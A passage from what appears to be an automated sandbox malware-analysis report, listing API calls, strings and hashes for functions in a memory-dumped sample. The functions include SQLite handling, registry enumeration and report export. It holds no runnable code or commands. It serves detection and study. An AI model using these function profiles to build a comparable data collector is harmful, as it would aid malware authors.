                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                              • API String ID: 3510742995-2446657581
                                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                              • memset.MSVCRT ref: 00405ABB
                                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                              • SetFocus.USER32(?), ref: 00405B76
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$FocusItemmemset
                                                                              • String ID:
                                                                              • API String ID: 4281309102-0
                                                                              • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                              • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _snwprintfwcscat
                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                              • API String ID: 384018552-4153097237
                                                                              • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                              • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                                              • String ID: 0$6
                                                                              • API String ID: 2029023288-3849865405
                                                                              • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                              • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                              APIs
                                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                              • memset.MSVCRT ref: 00405455
                                                                              • memset.MSVCRT ref: 0040546C
                                                                              • memset.MSVCRT ref: 00405483
                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$memcpy$ErrorLast
                                                                              • String ID: 6$\
                                                                              • API String ID: 404372293-1284684873
                                                                              • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                              • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                              APIs
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                                              • wcscpy.MSVCRT ref: 0040A107
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                              • String ID:
                                                                              • API String ID: 1331804452-0
                                                                              • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                              • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                              APIs
                                                                              Strings
                                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                              • <%s>, xrefs: 004100A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$_snwprintf
                                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                              • API String ID: 3473751417-2880344631
                                                                              • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                              • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscat$_snwprintfmemset
                                                                              • String ID: %2.2X
                                                                              • API String ID: 2521778956-791839006
                                                                              • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                              • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _snwprintfwcscpy
                                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                                              • API String ID: 999028693-502967061
                                                                              • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                              • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                              APIs
                                                                              • strlen.MSVCRT ref: 00408DFA
                                                                                • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                              • memset.MSVCRT ref: 00408E46
                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                              • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memsetstrlen
                                                                              • String ID:
                                                                              • API String ID: 2350177629-0
                                                                              • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                              • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset
                                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                              • API String ID: 2221118986-1606337402
                                                                              • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                              • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                              APIs
                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                              • memcmp.MSVCRT ref: 00408FB3
                                                                              • memset.MSVCRT ref: 00408FD4
                                                                              • memcmp.MSVCRT ref: 00409025
                                                                              • memset.MSVCRT ref: 00409042
                                                                              • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                              • String ID:
                                                                              • API String ID: 265355444-0
APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
• _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
• memset.MSVCRT ref: 0040C4D0
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
• String ID:
• API String ID: 4131475296-0
APIs
• memset.MSVCRT ref: 004116FF
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2618321458-3614832568
APIs
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
APIs
• AreFileApisANSI.KERNEL32 ref: 004174FC
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
• malloc.MSVCRT ref: 00417524
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
• free.MSVCRT ref: 00417544
• free.MSVCRT ref: 00417562
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
• API String ID: 4131324427-0
APIs
• GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
• GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
• free.MSVCRT ref: 0041822B
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: PathTemp$free
• String ID: %s\etilqs_$etilqs_
• API String ID: 924794160-1420421710
APIs
• memset.MSVCRT ref: 0040FDD5
  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 0040FE1F
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 1775345501-2769808009
APIs
• wcscpy.MSVCRT ref: 0041477F
• wcscpy.MSVCRT ref: 0041479A
• CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004147C1
• CloseHandle.KERNEL32(00000000), ref: 004147C8
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: wcscpy$CloseCreateFileHandle
• String ID: General
• API String ID: 999786162-26480598
APIs
• GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
• _snwprintf.MSVCRT ref: 0040977D
• MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: ErrorLastMessage_snwprintf
• String ID: Error$Error %d: %s
• API String ID: 313946961-1552265934
Strings
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID:
• String ID: foreign key constraint failed$new$oid$old
• API String ID: 0-1953309616
APIs
Strings
• foreign key on %s should reference only one column of table %T, xrefs: 004316CD
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
• unknown column "%s" in foreign key definition, xrefs: 00431858
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
                                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0044A6EB
                                                                              • memset.MSVCRT ref: 0044A6FB
                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
